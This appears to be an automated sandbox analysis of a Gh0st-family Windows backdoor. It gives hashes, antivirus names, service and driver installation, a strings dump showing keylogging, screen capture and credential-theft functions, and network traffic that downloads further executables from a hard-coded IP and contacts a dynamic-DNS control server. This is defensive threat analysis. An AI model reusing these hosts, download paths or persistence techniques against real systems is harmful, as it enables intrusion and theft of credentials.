Analysis Date2015-02-22 18:00:19
MD541ddfa1c6527d4471b12bbe1b94f9b52
SHA1bdc45af2da5a8363dae790499ec9c21c5dea1be8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1da0f04d754bc9bc60fd62a611662088 sha1: 35c4e152f19e418b19a28cace15516fba0c6e44e size: 6144
Section.rsrc md5: feec81e768b70b1326b9aa3a248074aa sha1: a8c7180a618b34e3765a50df3f06807084ed5d26 size: 116736
Section.tc md5: 6eca814a49771af43d45eaba37702ea5 sha1: da0b2544a8dd9f8a0b07617189e080b949898a89 size: 76288
Timestamp2011-11-25 12:02:17
PEhash11d42609867d277c812eaf0ed5d28319d08a55cf
IMPhashf683366ddf493cd68d5fc61a44ca3135
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)OnLineGames-GJV [Trj]:Viking-CF:Win32:Viking-CF
AVArcabit (arcavir)Win32.Viking.AR:Trojan.Redosdru.Gen.1
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Zegost.B!generic
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebTrojan.DownLoader9.7320
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Torr.BH!tr.bdr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)BackDoor.Generic_r.ZL
AVIkarusP2P-Worm.Win32.Palevo
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesTrojan.ServStart
AVMcafeeError Scanning File
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST\netsvcs ➝
NULL
RegistryHKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Parameters\ServiceDll ➝
C:\WINDOWS\system32\hackeyes.dll\\x00
RegistryHKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Description ➝
\\xbc\\xe0\\xb2\\xe2\\xba\\xcd\\xbc\\xe0\\xca\\xd3\\xd0\\xc2\\xd3\\xb2\\xbc\\xfe\\xc9\\xe8\\xb1\\xb8\\xb2\\xa2\\xd7\\xd4\\xb6\\xaf\\xb8\\xfc\\xd0\\xc2\\xc9\\xe8\\xb1\\xb8\\xc7\\xfd\\xb6\\xaf\\x00
Creates FileC:\WINDOWS\system32\hackeyes.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ServiceMicrosoft Device Manager - %SystemRoot%\System32\svchost.exe -k netsvcs
Starts ServiceMDM Serverice

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ Pid 828

Process
↳ Pid 872

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\WZCV4JYN\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KEGVIQDV\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KKZF8Z9O\desktop.ini
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0PQRSTU7\desktop.ini
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1132

Process
↳ Pid 1228

Process
↳ C:\WINDOWS\system32\spoolsv.exe

Process
↳ Pid 1892

Process
↳ Pid 1216

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\system\cURRENTcONTROLsET\sERVICES\MDM Serverice\Type ➝
288
Creates Filepipe\net\NtControlPipe10
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates MutexAAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8=

Network Details:

DNSluo2374041234.f3322.org
Type: A
219.235.4.118
DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 219.235.4.118:8086
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 219.235.4.118:8086
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1036 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47683073 74e8                         Gh0st.

0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c38cec6 c070e8f6   .blil..@.8...p..
0x000000c0 (00192)   99cd1b9e 319483f8 bd407c03 683603d0   ....1....@|.h6..
0x000000d0 (00208)   7d21b108 3bfe03c1 913527ce 6fbf76fd   }!..;....5'.o.v.
0x000000e0 (00224)   252eb3                                %..

0x00000000 (00000)   47683073 74e7                         Gh0st.

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c10                .blil..@..

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0aeee9a7   eep-Alive.......
0x000000b0 (00176)   eb626c69 6ce8c240 0c10                .blil..@..


Strings
y
z
Gh0s
E.P
\ghh
ijpp
.
wilg.x
[
{|
stu
v
.
f
.}~
wx
.
..
.O...

080404b0
3, 6, 0, 0
\A\..\..\
Comments
CompanyName
Copyright ? 2008
\Device\NtHid
Device Protect Application
\Driver\Tcpip
FILE
FileDescription
FileVersion
InternalName
IoDriverObjectType
@jjj
jjjj
jjjjh
jjjjj
jjjjjjjjh
LegalCopyright
LegalTrademarks
Microsoft Corporation
Microsoft(R) Windows(R) Operating System
\??\NtHid
ObReferenceObjectByName
OriginalFilename
PrivateBuild
ProductName
ProductVersion
PsLookupProcessByProcessId
SpecialBuild
StringFileInfo
svchost.dll
Translation
VarFileInfo
VS_VERSION_INFO
								
~0;~,}
?$?(?,?0?
0 0$0(0,0004080
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0%0/0@0E0R0f0
0!0.0C0M0W0
0&0;0G0M0o0
 0+020e0k0
0050Q0
0 060;0j0
0(090?0F0M0d0
0,0A0^0s0
0:0J0d0y0
00p0t0
0	1!1'181S1h1o1
0!1*1=1M1V1y1
0&1,181L1
0#161f1t1x1|1
[%02d/%02d/%d %02d:%02d:%02d] (%s)
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;
+0G0x0
0j/0@0E0R0f0
:#:0:K:[:`:i:t:
0p2t2x2|2
0T0X0\0`0d0h0l0p0t0x0|
;+;0;?;\;w;
:&:0:>:W:
1$1*10161<1B1H1N1T1Z1`1f1l1r1x1~1
1$111:1G1P1]1
1(1/1o1w1
1*1<1Z1l1
1)181B1P1m1|1
1"1B1U1i1t1
1.1E1K1Z1h1
1!1F1m1
1$1g1t1
1@1P1^1
1.1S1[1`1m1
127.0.0.1       localhost
191I1U1
1b2w2}2
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
;1<=<B<J<
="='=,=1=>=F=
1=>=F=
:1G1P1]1
1K1Z1h1
1l1.dll
??1type_info@@UAE@XZ
?%?2???]?
?%?2?]?
207C6A67-5861-4aaf-A336-C255C7AE4C57
2+222=2
2,22282>2D2J2O2U2b2h2n2t2
2%292D2
2(2B2N2W2c2l2x2
2(2B2N2W2c2n
2<2Q2W2h2p2
2<2Q{h2p2
2&3F3N3`3k3
2?3H3Q
2?3H3Q3
%-24s %-15s 
%-24s %-15s 0x%x(%d) 
%-24s %-15s %s 
2D2J2O2U2b1n2t2
>)>2>E>S>\>s>
>2>E>S>\>s>
2K2f2v2
:2;O;W;\;c;i;o;u;|;
2T2d2{2
2Y2w2}2
??2@YAPAXI@Z
313Q3V3_3o3x3
#32770
3!303?3
3$30363X3j3
3$30l3Xk
3!313W3w3
3 3(313;3^3
3&3+333@3T3e3
3)33393\3h3y3
3#3+3t3}3
3*353@3M3T3c3
3#3W3b3
343=3B3j3p3|3
3(4]4c4
3=4f4k4
353Q3}3
\360ACC.dat
\360ACC.log
\\.\360SpShadow0
360tray.exe
*37}CC
;3D;H;L
? ?*?3???D?N?W?a?o?y?
;3<;<N<
3r4x4~4
@3T3e3
??3@YAXPAX@Z
<)=3===Z=a=y=
{4_^]3
4&414]4
4$4-444A4J4Y4_4
4)4?4^4e4
44494A4
4%4+4G4
4%4+4G4z4
4(484<4@4D4H4L4P4T4X4h4l4p4t4x4
4+4B4N4[4b4
4)4I4a4
4#4L4r4
4/5K5V5
49-E88E-4c47-98DC
:!:,:4:C:v:
:,:4:@:\:d:p:
=,=4=@=\=h=
; <4<@<H<x<
:*:4:P:q:
4Q5e5x
4Q5e5x5
4R4Y4l4y4
5(51585
5$5)565K5b5t5
5#575?5N5
5!6&6/6
)56Ab5t5
5<6d6v6|6
5A5L5_5i5
;!;+;5;?;C;J;
;!;+;5;?;C;J;P;Z;d;n;x;
:5:F:Y:w:|:
;(;5;?;J;T;_;i;z;
5K5Q5a5
5U5h5q5
6$636<6B6M6W6
6 6(626?6H6Q6c6l6
6%6.6:6B6Y6^6i6
6.6:6C6M6W6\6
6'6.6F6K6
6 6<6H6d6p6
6<6]6i6
6)6J6e6v6
6!71767D7R7^7i7p7
696P6Y6~6
:6;B;P;g;x;
>!>&>6>G>g>s>
6o7t7x7|7
;7<><`<
738K8f8
7&727;7J7S7[7v7
7(767<7l7
7#767?7N7T7]7i7s7x7
777>7f7
777E7Q7X7d7l7v7
7:7A7b7v7
7,7L7P7d7p7x7
7'7R7_7
7 8?8N8n8
7{8	9?9p9
7 8S8u8
7&8V8h8
7?;K<?=
7k738w8
7L7Y7h7u7
?7N7T7]
7.|qCC
@.&'85
8,868<8A8K8Q8[8f8r8|8
8-8<8^8
8#8(8-8:8J8
8(8.898E8J8O8[8`8i8o8z8
889_9k9
8(8D8P8l8x8
8=8T8\8b8h8s8x8~8
8*8u8z8
8.8W8n8u8
8	9 9e9l9{9
8"9E9h9
>!>*>8>B>H>V>`>
>!>*>8>B>H>V>`>n>t>
:8;B;V;`;
;8;C;V;j;u;
;8<<<@<D<H<L<P<d<p<
8E:4;@=D=H=L=P=T=X=\=`=d=h=l=p=t=P?`?j?
9*:/$:
909D9P9l9t9
9$:-:3:8:
94A7A7DA-6D69-472e-8981-DBC71C77FC66
959S9^9
9&:5:F:Y:w:|:
9*:/:6:
@\96DBA2^
979A9}9
9!91969I9N9^9c9r9w9|9
9 9-9;9A9F9
9 9[9`9g9m9s9~9
999`9i9
9&9/9>9Q9e
9&9/9>9Q9e9o9{9
-9;9A9F9
9A:L:R:W:^:d:
9%:J:`:
~(9~$u
9.:U:p:}:
A1O1k2y2%4*4
A4J4Y4_4
AAAAAA
AAAAAAA
AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
_acmdln
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
Advapi32.dll
ADVAPI32.dll
agX \s
AllocateAndInitializeSid
Application
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND
AppMgmt
appmgmts.dll
appmgmts.dlld
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
<AtG<BtC
[autorun]
AVICAP32.dll
avp.exe
.?AVtype_info@@
=!>B>d>
bdagent.exe
_beginthreadex
bgTLOkN
BitBlt
BlockInput
browser
Browser
browser.dll
buffer error
buffer wrong
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
CallNextHookEx
calloc
CancelIo
 cannot be run i
capCreateCaptureWindowA
capGetDriverDescriptionA
C:\dll.pdb
C:\exe.pdb
CharNextA
ClearEventLogA
CloseClipboard
CloseDesktop
CloseEventLog
CloseHandle
CloseServiceHandle
CloseWindow
\cmd.exe
:C:M:d:m:
Common Files
ComPlus Applications
CONNECT 
ConnectGroup
ConnectNamedPipe
_controlfp
ControlService
ControlSet\Services
ConvertSidToStringSidA
CopyFileA
CP<Z<|<
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateFileMappingA
CreateMutexA
CreateNamedPipeA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateRemoteThread
CreateServiceA
CreateService(Parameters)
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
crypt'c
CryptSvc
cryptsvc.dll
C:\sys.pdb
CVideoCap
__CxxFrameHandler
_CxxThrowException
D0H0L0PM
D$0QhLA
D$(8D*
D$8RPQ
@.data
data error
D$(cvid
%d.%d.%d.%d
%d.%d.%d.%d 
DDDDDD
%d%d%d%d%d%d.bak
Ddk h$
default
Default
.DEFAULT\Keyboard Layout\Toggle
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
Description
DestroyCursor
Device
DeviceIoControl
(D/fc_oL
D$:f;E
=@>D>H>L>P>T>X>\>`>d>h>l>p>t>
DialParamsUID
DisconnectNamedPipe
DispatchMessageA
D$ IV32
;/;d;i;y;~;
D$lRPj
D$$MP42
dOCUMENTS AND sETTINGS\
Documents and Settings
DOS mode.
;';D<P<
D$PRPj
D$<PVh
D$\PWVh
D$(RPj
D$,RPQ
D$$RPU
;D$<s!
D$$SUV
D$TSUVW
=&=,=D=v=
&=,=D=v=
E8J8O8[8`8i8o8z8
EmptyClipboard
empty distance tree with lengths
EnableAdminTSRemote
Enabled
EnterCriticalSection
EnumProcessModules
EnumWindows
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
eParam$
_errno
Error configure
es.dll
EventSystem
ExAllocatePoolWithTag
_except_handler3
ExecuUA
ExFreePoolWithTag
ExitProcess
ExitThread
ExitWindowsEx
ExpandEnvironmentStringsA
explorer.exe
Explorer.exe
EXPLORER.EXE
Expor.exe
FastUserSwitchingCompatibility
fclose
fDenyTSConnections
Fdf+Fh
FhURUPQ
file error
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FlushFileBuffers
FlushViewOfFile
freeaddrinfo
FreeConsole
FreeLibrary
FreeResource
FreeSid
;F<W<h<"=K=f=
fwrite
GDI32.dll
GD]_[Y
GetActiveWindow
getaddrinfo
GetClipboardData
GetCommandLineA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetCursorInfo
GetCursorPos
GetDesktopWindow
GetDIBits
GetDiskFreeSpaceExA
GetDriveTypeA
GetExitCodeProcess
GetExitCodeThread
GetFileAttributesA
GetFileSize
GetFileTime
GetInputState
GetKeyNameTextA
GetLastError
GetLengthSid
GetLocalTime
GetLogicalDrives
GetLogicalDriveStringsA
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleFileNameExA
GetModuleHandleA
GetModuleInformation
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetSystemInfo
GetSystemMetrics
GetSystemTime
GetTempPathA
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUrlCacheEntryInfoA
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
Gh0st Update
Ghost.exe
GlobalAlloc
GlobalFree
GlobalLock
GlobalMemoryStatusEx
GlobalSize
GlobalUnlock
Global\UUPP %d
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
>G?S?y?
=G>V>v>
<H1>403 Forbidden</H1>
h1l1.T
\hackeyes.dat
hackeyes.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\0
H.data
:(;<;H;d;l;t;
HeapAlloc
HeapFree
helpsvc
Hotkey
|$HPWS
h.rdata
HtrHuk
http://
HTTP://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
HTTPS://
http://%s%s
http://%s/%s/%s.exe
ICClose
ICCompressorFree
ICOpen
ICSendMessage
ICSeqCompressFrame
ICSeqCompressFrameEnd
ICSeqCompressFrameStart
iD&YomH
?=?I?\?h?v?
IMM32.dll
ImmGetCompositionStringA
ImmGetContext
ImmReleaseContext
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
ingCompatibil
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
InstallModule
InstallShield Installation Information
insufficient memory
InterlockedExchange
Internet
InternetCloseHandle
Internet Explorer
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
IoCreateDevice
IoCreateSymbolicLink
IocSymd
IoDeleteDevice
IoDeleteSymbolicLink
IofCompleteRequest
IsValidSid
IsWindow
IsWindowVisible
i|tlh`
Iu	_^[
>>>i>v>
_;i;z;
|$`j/W
;,<J<Y<d<j<s<
 -k 4/
_kaspersky
kca:\lsa
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KeServiceDescriptorTable
KEveny
keybd_event
K:\Q.pdb`q
?+?>?l?
=>>L>[>
L$0Phx
L$4QRRRRRU
L$,91t
L$@_^][d
LeaveCriticalSection
L$$_^]f
L$@jdQV
L$$j\Q
L$L91t
L$LQVS
LoadCursorA
LoadLibraryA
LoadLibraryExA
LoadResource
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LockResource
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
Loopt.bat
L$(PQj
L$,QWV
L$_RasDefaultCredentials#0
L$ RQPj
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
l$(VW3
m1\U\Kcn
malloc
MapViewOfFile
MapVirtualKeyA
m ,.CC
m ,.CCC
M:d:m:
MDM Serverice
memcpy
memmove
memset
Messenger
Microsoft Device Manager
microsoft frontpage
Microsoft\Network\Connections\pbk\rasphone.pbk
MmGetSystemRoutineAddress
MmMapLockedPagesSpecifyCache
?M?n?x?
mouse_event
MoveFileA
MoveFileExA
Movie Maker
Mozilla/4.0 (compatible)
MPR.dll
MSN Gaming Zone
mspmsnsv.dll
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
mswsock.dll
MultiByteToWideChar
|$$MZu'
NDSUPQ
need dictionary
NETAPI32.dll
NetLocalGroupAddMembers
Netman
netman.dll
NetMeeting
netsvcs
netsvcs_0x%d
NetUserAdd
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
NPRPUSj
 NT\Curr
ntdll.dll
\\.\NtHid
NtHid.sys
Ntmssvc
ntmssvc.dll
ntoskrnl.exe
NtQuerySystemInformation
ObfDereferenceObject
ObReferenceObjectByHandle
ObReferenceObjectByPointer
oft\Wud
OpenClipboard
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCManager()
OpenSCManagerA
OpenServiceA
OPEN=%s\%s
OpenThread
OpenWindowStationA
+OpsSCM
|otB.8
Outlook Express
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
>">/>p>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDd
Parameters
\Parameters
PathFileExistsA
pchsvc.dll
__p__commode
PeekNamedPipe
>P?e?k?
__p__fmode
PhoneNumber
Phvidc
\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
PortNumber
PostMessageA
PostThreadMessageA
PPPPPP
PPPPPP%SystemRoot%\system32\hackeyes.dll
Process32First
Process32Next
ProductName
Program Files\Internet Explorer\iexplore.exe
Program Files\WinRAR\Rar.exe
PSAPI.DLL
PsGetVersion
PsTerminateSystemThread
putchar
;<<P<x<
<'<=<P<Z<|<
P;Z;d;n;x;
;Q;];};
qmgr.dll
QQQQQQQ
QRPPPPPPVP
'q*#rrssC
QSSSSSSSSj
QueryServiceStatus
RasDialParams!%s#0
 `.rdat[
`.rdata
ReadFile
ReadProcessMemory
realloc
recycle.{645FF040-5081-101B-9F08-00AA002F954E}
RECYCLER
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
REG_BINARY
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
RegisterServiceCtrlHandlerA
\Registry\Machine
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegQueryValueEx(Svchost\netsvcs)
RegQueryValueEx(Type)
RegSetValueExA
RegSetValueEx(start)
regsvc.dll
REG_SZ
ReleaseDC
ReleaseMutex
.reloc
@.reloc
Remote
RemoteRegistry
RemoveDirectoryA
ResetEvent
ResumeThread
<'=.=R=f=
-<RoA%'_h7
RPCRT4.dll
RtlInitUnicodeString
RtlIoU
%s\*.*
=;>S>}>
S1[1`1m1
%sautorun.inf
{schedsvc
schedsvc.dll
Schedule
<script 
%s%d%d%d%d%d%d
%s\desktop.txt
%s\dllcache\lsasvc.dll
SDPSRV
%s\drivers\etc\hosts
%s%d%s
Security
SeDebugPrivilege
SelectObject
SendMessageA
ServiceDll
ServiceMain
SeShutdownPrivilege
__set_app_type
SetCapture
SetClipboardData
SetCursorPos
SetEndOfFile
SetErrorMode
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetLastError
SetNamedPipeHandleState
SetProcessWindowStation
SetRect
SetSecurityDescriptorDacl
SetServiceStatus
SetThreadDesktop
SetUnhandledExceptionFilter
__setusermatherr
SetWindowsHookExA
sfc_os.dll
sgegpjde11207255ADAAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8=
